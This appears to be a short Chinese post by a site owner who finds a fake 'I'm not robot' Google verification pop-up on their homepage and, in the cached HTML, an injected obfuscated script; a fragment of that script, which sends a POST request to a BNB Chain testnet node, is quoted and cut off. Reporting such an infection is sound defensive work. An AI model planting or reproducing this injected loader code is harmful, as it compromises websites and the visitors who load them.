访问网站主页 莫名其妙 多了个I'm not robot 谷歌验证窗口
查看缓存的HTML页面 发现多了一段 script 代码
// 发送 POST 请求到 BSC 测试网节点
const _0x15a0e6 = 'https://data-seed-prebsc-1-s1.bnbchain.org:8545/';
const _0x56f770 = await fetch(_0x15a0e6, {
method: 'POST',
headers: {
'Accept': 'application/json'...